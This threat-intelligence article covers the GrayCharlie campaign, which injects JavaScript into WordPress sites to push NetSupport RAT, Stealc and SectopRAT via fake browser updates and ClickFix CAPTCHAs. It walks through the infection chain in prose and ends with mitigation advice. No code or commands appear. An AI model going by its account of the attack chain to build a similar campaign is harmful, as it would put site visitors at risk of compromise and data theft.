GrayCharlie Exploits WordPress Sites to Deploy NetSupport RAT and Stealc Malware
A sophisticated cyber threat actor, identified as GrayCharlie, has been actively compromising WordPress websites since mid-2023. By embedding malicious JavaScript into these sites, the group aims to distribute malware to unsuspecting visitors. GrayCharlie is associated with the previously tracked SmartApeSG cluster, also known as ZPHP or HANEMONEY.
Primary Malware Deployed:
– NetSupport RAT: A remote access trojan that grants attackers full control over infected systems.
– Stealc: An information-stealing malware designed to extract sensitive data from compromised machines.
– SectopRAT: A more recent addition to their arsenal, further expanding their capabilities to exfiltrate information.
Infection Mechanism:
GrayCharlie employs a methodical approach to infect systems:
1. JavaScript Injection: The group inserts a script tag into the Document Object Model (DOM) of legitimate but compromised WordPress sites. This tag references an external JavaScript file hosted on attacker-controlled servers.
2. User Profiling: When a visitor accesses the infected page, the script assesses their browser and operating system to tailor the subsequent attack phase.
3. Deceptive Prompts: Based on the profiling, victims are presented with either:
– Fake Browser Updates: Convincing prompts urging users to update their browsers.
– ClickFix-Style Fake CAPTCHAs: Deceptive challenges designed to trick users into executing malicious code.
Infrastructure and Operations:
Analysts have traced GrayCharlie’s backend infrastructure primarily to hosting services like MivoCloud and HZ Hosting Ltd. The group manages multiple clusters of NetSupport RAT command-and-control (C2) servers, each characterized by unique TLS certificate naming patterns, license keys, and serial numbers. These servers have been systematically deployed throughout 2025.
To maintain a low profile, GrayCharlie administers C2 servers over TCP port 443 and utilizes SSH for managing staging servers, making their traffic blend seamlessly with legitimate activities. Observations suggest that some members of GrayCharlie are Russian-speaking, based on browsing patterns from higher-tier infrastructure.
Targeted Industries and Regions:
GrayCharlie’s attacks are widespread, affecting various industries globally. However, the United States has been a primary target. Notably, at least fifteen U.S. law firm websites were found to have identical malicious JavaScript injections pointing to the same attacker domain.
Investigations indicate that these law firms were compromised through a supply-chain attack involving SMB Team, an IT services company catering to numerous law firms across North America. Stolen credentials associated with an SMB Team email address were discovered around the time the malicious domain became active.
Detailed Infection Process:
Once a victim interacts with the deceptive prompts:
1. Execution of Malicious Script: The fake update JavaScript triggers WScript, which then launches PowerShell.
2. Malware Deployment: PowerShell downloads and extracts the full NetSupport RAT client into the user’s AppData folder.
3. Persistence Mechanism: In the ClickFix scenario, the user is tricked into pasting an attacker-supplied command that retrieves a batch file, installs the RAT, and creates a Registry Run key to ensure the malware executes on every system reboot.
4. Secondary Payloads: Operators can connect via C2 servers, perform system reconnaissance, and deploy additional malware like SectopRAT as needed.
Recommendations for Mitigation:
To defend against such sophisticated attacks, organizations should:
– Block Known Malicious IPs and Domains: Implement network-level blocks for identified GrayCharlie infrastructure.
– Deploy Detection Rules: Utilize YARA, Snort, and Sigma rules to identify and respond to malicious activities promptly.
– Regularly Update and Patch Systems: Ensure all software, especially WordPress installations and plugins, are up-to-date to minimize vulnerabilities.
– Educate Users: Train staff to recognize phishing attempts and deceptive prompts, reducing the likelihood of inadvertent malware execution.
Conclusion:
GrayCharlie’s campaign underscores the evolving nature of cyber threats targeting widely-used platforms like WordPress. By understanding their tactics and implementing robust security measures, organizations can better protect themselves and their users from such insidious attacks.
